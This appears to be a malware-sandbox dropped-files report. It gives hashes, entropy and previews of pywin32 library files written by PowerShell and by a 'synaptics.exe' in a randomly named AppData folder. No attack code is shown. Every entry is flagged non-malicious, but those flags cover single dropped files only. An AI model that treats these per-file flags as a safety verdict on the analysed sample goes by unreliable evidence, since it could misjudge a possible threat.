                                                                                                                                                                                                            Preview:# Generated by h2py from d:\mssdk\include\winnetwk.h..WNNC_NET_MSNET = 0x00010000..WNNC_NET_LANMAN = 0x00020000..WNNC_NET_NETWARE = 0x00030000..WNNC_NET_VINES = 0x00040000..WNNC_NET_10NET = 0x00050000..WNNC_NET_LOCUS = 0x00060000..WNNC_NET_SUN_PC_NFS = 0x00070000..WNNC_NET_LANSTEP = 0x00080000..WNNC_NET_9TILES = 0x00090000..WNNC_NET_LANTASTIC = 0x000A0000..WNNC_NET_AS400 = 0x000B0000..WNNC_NET_FTP_NFS = 0x000C0000..WNNC_NET_PATHWORKS = 0x000D0000..WNNC_NET_LIFENET = 0x000E0000..WNNC_NET_POWERLAN = 0x000F0000..WNNC_NET_BWNFS = 0x00100000..WNNC_NET_COGENT = 0x00110000..WNNC_NET_FARALLON = 0x00120000..WNNC_NET_APPLETALK = 0x00130000..WNNC_NET_INTERGRAPH = 0x00140000..WNNC_NET_SYMFONET = 0x00150000..WNNC_NET_CLEARCASE = 0x00160000..WNNC_NET_FRONTIER = 0x00170000..WNNC_NET_BMC = 0x00180000..WNNC_NET_DCE = 0x00190000..WNNC_NET_DECORB = 0x00200000..WNNC_NET_PROTSTOR = 0x00210000..WNNC_NET_FJ_REDIR = 0x00220000..WNNC_NET_DISTINCT = 0x00230000..WNNC_NET_TWINS = 0x00240000..WNNC_NET_RDR2SAMPLE =
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7588
                                                                                                                                                                                                            Entropy (8bit):4.669423145851817
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Qj/xvYTINZV9S7AXoTTLn7UYSLdsfWxkwP0cIW:QbxwT4T9S7AXoT3LkZP0cIW
                                                                                                                                                                                                            MD5:F8B020F7F821BF87FD1F96669835DC0A
                                                                                                                                                                                                            SHA1:8FFE92A6F1FDCB1E64A18FBC961B99BA92FB91F8
                                                                                                                                                                                                            SHA-256:AF0A223712562F92CF16E573AF7EAD15F80B6619FCB0089403B93E2C129A901C
                                                                                                                                                                                                            SHA-512:02DE1BC40BAF20CB4F91B4A5593A69FD6A6E0785D05F9436F9140B399C690ED65C54E41EE5A3EDD14ADEC907D3B60F60E113580851BFA7D032A6E154335ECE19
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""..Windows Process Control....winprocess.run launches a child process and returns the exit code...Optionally, it can:.. redirect stdin, stdout & stderr to files.. run the command as another user.. limit the process's running time.. control the process window (location, size, window state, desktop)..Works on Windows NT, 2000 & XP. Requires Mark Hammond's win32..extensions.....This code is free for any purpose, with no warranty of any kind...-- John B. Dell'Aquila <jbd@alum.mit.edu>.."""....import msvcrt..import os....import win32api..import win32con..import win32event..import win32gui..import win32process..import win32security......def logonUser(loginString):.. """.. Login as specified user and return handle... loginString: 'Domain\nUser\nPassword'; for local.. login use . or empty string as domain.. e.g. '.\nadministrator\nsecret_password'.. """.. domain, user, passwd = loginString.split("\n").. return win32security.LogonUser(.. user,..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:C++ source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31187
                                                                                                                                                                                                            Entropy (8bit):5.3610985226758485
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:I8BO8J3PIf0u4yG6VbxwjhBk4/D7aELY0DOjCX7ZQP3Z0Yys3c:bgqwf0u4yG6hxwPk4/D40DYCX7+/OYyV
                                                                                                                                                                                                            MD5:3B3E24C0005C27233A2F85BF71C31A68
                                                                                                                                                                                                            SHA1:280C5C4899E7AC1D08D3AC4E2120E95C983E7F6C
                                                                                                                                                                                                            SHA-256:AECBE5B7C5E64CC178C6D680EAD84C968390893D83946BF2E281EB6BB54FA146
                                                                                                                                                                                                            SHA-512:FA8E8586B4257E35A7440F92884490CAD3863638298A1EB79B36A03D5D89469691C63D74B916297050629B9D46DD20742A7A53694288A9BA04FD342A4DF9ECF9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:..#ifndef __PYWINTYPES_H__..#define __PYWINTYPES_H__....// If building under a GCC, tweak what we need...#if defined(__GNUC__) && defined(_POSIX_C_SOURCE)..// python.h complains if _POSIX_C_SOURCE is already defined..#undef _POSIX_C_SOURCE..#endif....// windows rpc.h defines "small" as "char" which breaks Python's accu.h,..// so we undefine it before including python...#ifdef small..#undef small..#endif....#include "Python.h"..#include "structmember.h"..#include "windows.h"....// Helpers for our modules...// Some macros to help the pywin32 modules co-exist in py2x and py3k...// Creates and initializes local variables called 'module' and 'dict'.....// Maybe these should all be removed - they existed to help in the py2->3..// transition...// On one hand: the code would be cleaner if they were all just re-inlined?..// On the other: high confidence everything uses the exact same patterns?..// (Regardless, *some*, eg, PYWIN_MODULE_INIT_RETURN_* should be re-inlined!)....// Use to define the
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4361
                                                                                                                                                                                                            Entropy (8bit):5.449110214137157
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CAuWEUIps5sfJW4l9OD4Gt5wdUVnXyPM7CNk5iO5VGcXlOLiQ77:Cm6s5sfQ42D4Gt5wMnXyk7Cm5BVGglqb
                                                                                                                                                                                                            MD5:E07C4F007F9FEDE1723067EEAD214267
                                                                                                                                                                                                            SHA1:B67546034E00D6416417B9ADEFA306DA3D52E713
                                                                                                                                                                                                            SHA-256:9187A8ACEAC8BC2FDB760F3069DB4D0337208C3CB650EED7E201EDA4916F4130
                                                                                                                                                                                                            SHA-512:567E3F2C8E0E49999CBEC75EFDD2E53B0DCFD6BE6555059E6190600F3BD740493523B690F6B37450A08B933CF44356A1405F550C6683FCB08594B9DFEB7DEA58
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g<........................@...s<...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.rFd.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...e.d.d.d...Z.d/d.d...Z.d0d.d...Z.d1d.d...Z.e.j.Z.e.e.g.e._.e.e._ e.e._!e.j"Z#e.e.g.e#_.e.e#_ e.e#_!e.j$Z%e.e.e.e.e.e.g.e%_.e.e%_ e.e%_!d.Z&d2d.d ..Z'd3d$d%..Z(e&f.d4d,d-..Z)d.S.)5a7....A pure-python re-implementation of methods used by win32verstamp..This is to avoid a bootstraping problem where win32verstamp is used during build,.but requires an installation of pywin32 to be present..We used to work around this by ignoring failure to verstamp, but that's easy to miss...Implementations adapted, simplified and typed from:.- https://github.com/enthought/pywin32-ctypes/blob/main/win32ctypes/core/ctypes/_util.py.- https://github.com/enthought/pywin32-ctypes/blob/main/win32ctypes/core/cffi/_resource.py.- https://github.com/enthought/pywin32-ctypes/blob/main/win32ctypes/pywin32/win32api.py..---..(C) Copyright
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):402
                                                                                                                                                                                                            Entropy (8bit):5.328523653696847
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C1oYYrrpHIHL+VfT14LSHGj//2IaFtLZVs:CoxrpHImfB82v5Ls
                                                                                                                                                                                                            MD5:84356902C1B1F01C89042162CAA8E382
                                                                                                                                                                                                            SHA1:129BBD90FC7D319CC27A0CA9871223365602BE9D
                                                                                                                                                                                                            SHA-256:D2009800C52C37DB11866C23A1E6F5F1CC12C3BF69AA4D53F60ED3201CF06091
                                                                                                                                                                                                            SHA-512:3C5EFA9E380E5FB4D8C526EC22D12C6717CAA919818EACE1BAF71DDE4F8875F619574510357B7A0EEA2BEA112CA33D8A97AE1FD821E00C55D811FDBDA8A7BF84
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s"...d.d.l.Z.d.d.l.T.e.j.d.e.d.....d.S.)......N)...*z[Importing the global `afxres` module is deprecated. Import from `pywin.mfc.afxres` instead.)...category)...warningsZ.pywin.mfc.afxres..warn..DeprecationWarning..r....r.....gC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/lib/afxres.py..<module>....s................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):40614
                                                                                                                                                                                                            Entropy (8bit):5.660817094889497
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:vtAfpTwi6K5/lX3BQnWf/kfmrrOpQMKd92puo:v+X6ulX3BVf/kerrOpQRo
                                                                                                                                                                                                            MD5:1EF819507A0046147D1EC8A86F223DF5
                                                                                                                                                                                                            SHA1:A9DEDA4812FF30F66EA6E1EEB49C77FA21A529CB
                                                                                                                                                                                                            SHA-256:4153CCD53E2DA4EF2B70B493AF7D163C6A96387CEC7381FA182077568234A69A
                                                                                                                                                                                                            SHA-512:EF3C9F51E50B72ED7268F242B01C165A7E575B61BC3FA6BC4FD82EDDA04C9D598295FEF90F62C4C25F1CF1749850A327897F55D971A9F28F278493F979522CD7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g]........................@...s.-..d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z e.d...Z!e.d...Z"e.d ..Z#e.d!..Z$e.d"..Z%e.d#..Z&e.d$..Z'e.d%..Z(e.d&..Z)e.d'..Z*e.d(..Z+e.d)..Z,e.d*..Z-e.d+..Z.e.d,..Z/e.d-..Z0e.d...Z1e.d/..Z2e.d0..Z3d.Z4d1Z5d2Z6d3Z7d4Z8d.Z9e9d...Z:e9d...Z;e9d5..Z<e9d...Z=e9d6..Z>e9d7..Z?d.Z@e.d...ZAe.d...ZBe.d5..ZCe.d...ZDe.d6..ZEe.d7..ZFe.d8..ZGe.d...ZHe.d9..ZIe.d:..ZJe.d;..ZKe.d<..ZLe.d...ZMe.d=..ZNe.d>..ZOd?ZPd@ZQdAZRdBZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYd.ZZd.Z[d.Z\d5Z]d.Z^dCZ_e_e[B.Z`e_e\B.Zae_e]B.Zbe_e^B.ZcdDZdd.Zed.Zfd.Zgd.Zhd.Zid.Zjd.Zkd.Zld.ZmdEZndFZod.Zpd.ZqdGZrd.Zsd.Ztd.ZudHZvd.Zwd.Zxd.Zyd.Zzd.Z{d.Z|d.Z}d.Z~d.Z.dIZ.e.Z.e~Z.e.Z.eoZ.d.Z.d.Z.dJZ.e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d5Z.d.Z.dKZ.dLZ.d.Z.d.Z.d.Z.e6d...Z.e6d...Z.e6dM..Z.e.Z.e6d...Z.e6d5..Z.e6dN..Z.e.Z.e6d...Z.e6d9..Z.e.Z.e6d6..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):27325
                                                                                                                                                                                                            Entropy (8bit):5.6220071929863265
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:M+sWxXdqe8n4uQEJ4Uu/s2w246VVYOlvyA+LthFQqLt0gpy1pDRpWrbK7jd:MPWZdTnvfD4yV7vy3Fjt0fV3WrCjd
                                                                                                                                                                                                            MD5:38224D86E337C37542592D09C1DF19D7
                                                                                                                                                                                                            SHA1:2FE8F316F61CD0449484F99070E36CE0D91F84F1
                                                                                                                                                                                                            SHA-256:2AD8791FF2EB37D12FB3B8EE86EAB30ADCFC490ED1DFF04091FFE4CACC36A96B
                                                                                                                                                                                                            SHA-512:F09910AD77D2CA7B484DE934E5829B021EFAB947357CBFC93E70B1495C46428DA551EB8B133225FDB6BBD5C61AC1357B6ECFF2E26C855ACB9BE001774B32A340
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.y.......................@...s....d.d.l.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d Z$d!Z%d"Z&d#Z'd$Z(d%Z)d&Z*d'Z+d(Z,d)Z-d*Z.d+Z/d,Z0d-Z1d.Z2d/Z3d0Z4d1Z5d.Z6d.Z7d2Z8d3Z9d4Z:d.Z;d5Z<d6Z=d5Z>d7Z?d8Z@d9ZAd.ZBe6d...ZCe6d...ZDe6d...ZEe6d...ZFe6d...ZGe6d...ZHe6d...ZIe6d...ZJe6d...ZKe6d...ZLe6d...ZMe6d...ZNe6d:..ZOe6d;..ZPe6d<..ZQe6d...ZRe6d=..ZSe6d>..ZTe6d?..ZUe6d@..ZVe6d@..ZWd.ZXd.ZYd.ZZd.Z[d.Z\d.Z]d.Z^d.Z_d.Z`d.Zad.Zbd<ZcdAZddBZed.Zfd.Zgd.ZhefZiegZjehZkedZleddC..ZmdDZnd.ZodEZpdFZqdGZreqZsdHZtd.Zud.Zvd.Zwd.Zxd.Zyd.ZzdIZ{dEZ|dJZ}dFZ~dKZ.d2Z.dLZ.d.Z.e7d...Z.e7d...Z.e7d...Z.e7d...Z.e7d...Z.e.Z.e Z.e!Z.e"Z.e#Z.e$Z.dMZ.d.Z.d.Z.d.Z.d.Z.e.e.B.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d2Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d2Z.dLZ.d.Z.d6Z.d5Z.dAZ.d.Z.d.Z.e8d...Z.e8d...Z.e8d...Z.e8d...Z.e8d...Z.e8d...Z.e8d...Z.e8d...Z.e8d...Z.dLZ.e%Z.e&Z.e'Z.e(Z.e)Z.e*Z.e+Z.e,Z.e-Z.e3Z.e2Z.d.Z.d.Z.d.Z.d.Z.d.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6815
                                                                                                                                                                                                            Entropy (8bit):5.683818366503823
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CqOpt0PaNQHzMCdb9TfyLfBCFklxgaM1mbKXR84qznpqYCA6e1+7FnalpbD:EkDHzM69TyLf4Yga4mNqYN9+7Falx
                                                                                                                                                                                                            MD5:DF3BAA4E07C7C78DE72F15E587263CC2
                                                                                                                                                                                                            SHA1:270A9D316F417DCCFA247C79E11A316F30280487
                                                                                                                                                                                                            SHA-256:FA0D731FBDBD70E4C21E20DD172E0043D5CFD7747FA3F75BEA1988EC5EAC7427
                                                                                                                                                                                                            SHA-512:63961629B16ECFAC443D9BA7D1A388FF25915A77D630EA3CA9CA2DBDEDCB16364A34BF1C09EDD033CA7F78AFB292A09E83C4585B55A29A963424A2DE0C29C0CC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sH...d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d Z&d!Z'd"Z(d#Z)d$Z*d%Z+d&Z,d'Z-d.Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d(Z5d)Z6d*Z7d+Z8d,Z9d-Z:d.Z;d.Z<d.Z=d/Z>d.Z?d.Z@d.ZAd.ZBd0ZCd1ZDd.ZEd.ZFd.ZGd2ZHd3ZId.ZJd.ZKd.ZLd.ZMd ZNd4ZOd5ZPd6ZQd7ZRd8ZSd9ZTd:ZUd;ZVd<ZWd=ZXd<ZYd=ZZd>eVd?f.eVd@f.eVdAf.eVdBf.eWdCf.eWdDf.eWdEf.eWdFf.eWdGf.eXdHf.eXdIf.eWdJf.eWdKf.eWdLf.eWdMf.eXdNf.eWdOf.eWdPf.eWdQf.eWdRf.eWdSf.eWdTf.eWdUf.eWdVf.eWdWf.eWdXf.g.Z[e\e...dY..dZf.eVd[f.eVd\f.g.Z]eVd]f.eVd^f.eVd_f.eVd`f.g.Z^eVdaf.eVdbf.e\e...dY..dcf.e\e...dY..ddf.eVdef.eVdff.g.Z_dge\e.d.....dY..dhf.g.Z`eWdif.eVdjf.eVdkf.g.ZaeVdlf.eVdmf.eVdnf.dodpdqg.ZbeZdrf.eYdsf.eYdjf.g.Zc[V[W[X[Y[Ze.jdZddtdu..ZeG.dvdw..dw..Zfdxdy..Zgdzd{..Zhd|d}..Zid~d...Zjd.d...Zkd.d...Zld.d...Zmd.d...Zneod.k...r ed..Zpe&ep_qek..Zrerep_seeep..Ztetd.k...r.eud.etf.......everjw..D.]TZxep.y....e!ep_qerjzex..ep_{ee
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20632
                                                                                                                                                                                                            Entropy (8bit):5.718639063002981
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:DTH7zqErwqQTWYnReVztUwYCmTwjqVvbeup7gENQ:Dj7zUNSYgVztECmEOVvSubu
                                                                                                                                                                                                            MD5:945D5D72D71CC498FB8F7D47A7B3887B
                                                                                                                                                                                                            SHA1:D98A0C9F7C4B1C29C16088E3768ECAC3E970C99A
                                                                                                                                                                                                            SHA-256:EF3E10508D65A5AA28918B11EFEFBA6588499CAE61F3F90E684897E0637EC968
                                                                                                                                                                                                            SHA-512:8D3D7611AD500A20CCBA7CA88FB0F8F1B465E0EDDB203016D0440AF849290C0FE7B01BCDF8BF86E2BDCEFF9508FC9834EC3B663E5A4113E60EDEF2327B79101F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g#Z.......................@...s2...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.e.Z.e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.e.B.d.B.Z.e.e.B.e.B.e.B.e.B.Z e.e.B.e.B.e.B.e.B.e.B.Z!e.e.B.e.B.e.B.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(d.Z)d.Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d Z1d.Z2d.Z3d.Z4d.Z5d!Z6d"Z7d.Z8d#Z9d$Z:d.Z;d%Z<d&Z=d.Z>d'Z?d(Z@d)ZAd*ZBd+ZCd,ZDd-ZEd.ZFd/ZGd0ZHd1ZId2ZJd3ZKd4ZLd5ZMd6ZNd7ZOd8ZPd9ZQd:ZRd;ZSd<ZTd=ZUd>ZVd?ZWd@ZXdAZYdBZZdCZ[dDZ\dEZ]dFZ^dGZ_dHZ`dIZadJZbdKZcdLZddMZed.ZfdNZgdOZhdPZidQZjdRZkejZldSZmdTZndUZodVZpdWZqd.Zrd.Zsd.Ztd.Zud.Zvd.Zwd.Zxd.ZydXZzd.Z{d.Z|d.Z}d.Z~d.Z.d.Z.d.Z.d.Z.d$Z.d$Z.d!Z.d"Z.d.Z.d.Z.d.Z.d.Z.d#Z.dYZ.dZZ.d[Z.d\Z.d]Z.d^Z.d.Z.d_Z.d_Z.d.Z.d.Z.d.Z.d.Z.d^Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d`Z.d.Z.d.Z.d.Z.d.Z.daZ.dbZ.dcZ.ddZ.deZ.dfZ.dgZ.dhZ.diZ.djZ.dkZ.dlZ.dmZ.dnZ.doZ.dpZ.dqZ.drZ.dsZ.dtZ.duZ.dvZ.dwZ.dxZ.d.Z.d.Z.d.Z.d.Z.e.Z.e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.e.B.e.B.e.B.e.B.e.B.e.B.e.B.e.B.Z.e.e.B.Z.e.e.B.e.B.e.B.Z.e.Z.d.Z.d.Z.d.Z.d.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):549
                                                                                                                                                                                                            Entropy (8bit):5.479972004916833
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C1H8RtWsrPJeMS4OjyJasv6OlBJ/2IagOtmm:CHetWsheD4kyJTSOzx2fr
                                                                                                                                                                                                            MD5:298391EBF4C22B6FFEA67C0F03214BCF
                                                                                                                                                                                                            SHA1:F93765C13C21CB81F64F029CC6BE37F60603616C
                                                                                                                                                                                                            SHA-256:6834C2BD4810ACD0FCB5BDC6FF5AF5AB3631D7CC84AAB172BEB90DE4EB1E04E6
                                                                                                                                                                                                            SHA-512:F90CD51F1602F7A94E7A988C3868E3EE932216084A2347E9D2CA86B655033251A676B47C4342B8E8598E146B58AC38F038FE695A98730B473E30DB7276139497
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g ........................@...s....z.d.d.l.Z.W.n...e.y.......Y.d.S.w.d.d.l.Z.e.j.D.]<Z.e.j...e...rTe.e.d...r-e...e.......d.S.e.j.d.....e...sQe.j.d.....e.j.e...d...e.j.d.<.e.e.j...e.j.d.....e.j.d.<...d.S.q.d.S.)......N..add_dll_directory..PATH..).Z.pywin32_system32..ImportError..os..__path__..path..isdir..hasattrr......environ..startswith..replace..pathsep..r....r.....rC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/lib/pywin32_bootstrap.py..<module>....s".....................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):523
                                                                                                                                                                                                            Entropy (8bit):5.493554056319541
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CPH8RtWsrPJeMS4OjyJasv6OlBYfsTztmm:UetWsheD4kyJTSOzYfcr
                                                                                                                                                                                                            MD5:1CDB4B5EA79B004606E0D8BEB911CA4D
                                                                                                                                                                                                            SHA1:878703ADFCEAACAC889E16604C4197E598517A87
                                                                                                                                                                                                            SHA-256:D1560D9EA0FA00AC7B4717C9D321BEF5C99C01489E7836A4092E142DE9114DED
                                                                                                                                                                                                            SHA-512:290A64102F0CBF6858E9F6CBA6C7F59FCC65467F7013C27538B29270C2A28BA5123EA0526289A1CCCCB475DE6FDE0261EC863B56019C1CDB520BC9E2E9A90169
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g ........................@...s....z.d.d.l.Z.W.n...e.y.......Y.d.S.w.d.d.l.Z.e.j.D.]<Z.e.j...e...rTe.e.d...r-e...e.......d.S.e.j.d.....e...sQe.j.d.....e.j.e...d...e.j.d.<.e.e.j...e.j.d.....e.j.d.<...d.S.q.d.S.)......N..add_dll_directory..PATH..).Z.pywin32_system32..ImportError..os..__path__..path..isdir..hasattrr......environ..startswith..replace..pathsep..r....r.....XC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\win32\lib\pywin32_bootstrap.py..<module>....s".....................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7939
                                                                                                                                                                                                            Entropy (8bit):5.28348924381659
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CSWflBdoqvpre20Xlu39lNHv1R6ZFJXj+oZre+iPn/M4DRJst0aXI2TGK2LRGC8N:Sfempre2sM39jv1R6ZFJXjTZrPifEA7y
                                                                                                                                                                                                            MD5:F6C6F44E666EF3B143B9FAB0CBFE54F4
                                                                                                                                                                                                            SHA1:3F3C76A227DC21071F4EBEA527C9E04FAA1BA78E
                                                                                                                                                                                                            SHA-256:B54998379CFD26512F1C776B95DBC766B772EABB6C072E07C900C154EC578101
                                                                                                                                                                                                            SHA-512:EF8C30CD536145DDF4C508F3B39B76B6DBB513C52435D8EDE4582BE1710E1C458BCF994AC5E3110DE4F0D864F8E7D6257A582A9B577B1589299A1749A7DFE8DF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g|*.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.e.j.g.Z.d.a.d.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.d...Z.d.S.)......Nc....................@...s<...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...LeakTestCasea....An 'adaptor' which takes another test. In debug builds we execute the. test once to remove one-off side-effects, then capture the total. reference count, then execute the test a few times. If the total. refcount at the end is greater than we first captured, we have a leak!.. In release builds the test is executed just once, as normal... Generally used automatically by the test runner - you can safely. ignore this.. c....................C...s@...t.j...|.....|.|._.d.|._.d.|._.t.t.d...r.|...j.|.j.7..._.d.S.d.S.).N............gettotalrefcount)...unittest..TestCase..__init__..real_test..num_test_cases..num_lea
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1574
                                                                                                                                                                                                            Entropy (8bit):5.784272187037021
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CgpkypV0zqY6g3JBMudMKucFBfrGxXFK6/rZ4CQ57GgtPH32qzPZShyQ16Y7:CgFMR/M3cFBfp6jZpq7Gy320gdb
                                                                                                                                                                                                            MD5:0E295D75DA37EC8E0635DAC013E96D9C
                                                                                                                                                                                                            SHA1:87FCC82280639B8EF34FD32376F94FFBAFD938C9
                                                                                                                                                                                                            SHA-256:3AB0DD315D2DA8BDEABCE09AAAAC8533F27F657ADCA17212D729ED1996A5FF24
                                                                                                                                                                                                            SHA-512:080BA8706FA25B3421B2A596134FB7286358BFF8DEB498BD4DCD84177282C61BC0BA30BDFD8540E1C297B9469D5F5DB1ADD74C6E9BD74278DB9BC238887592B0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
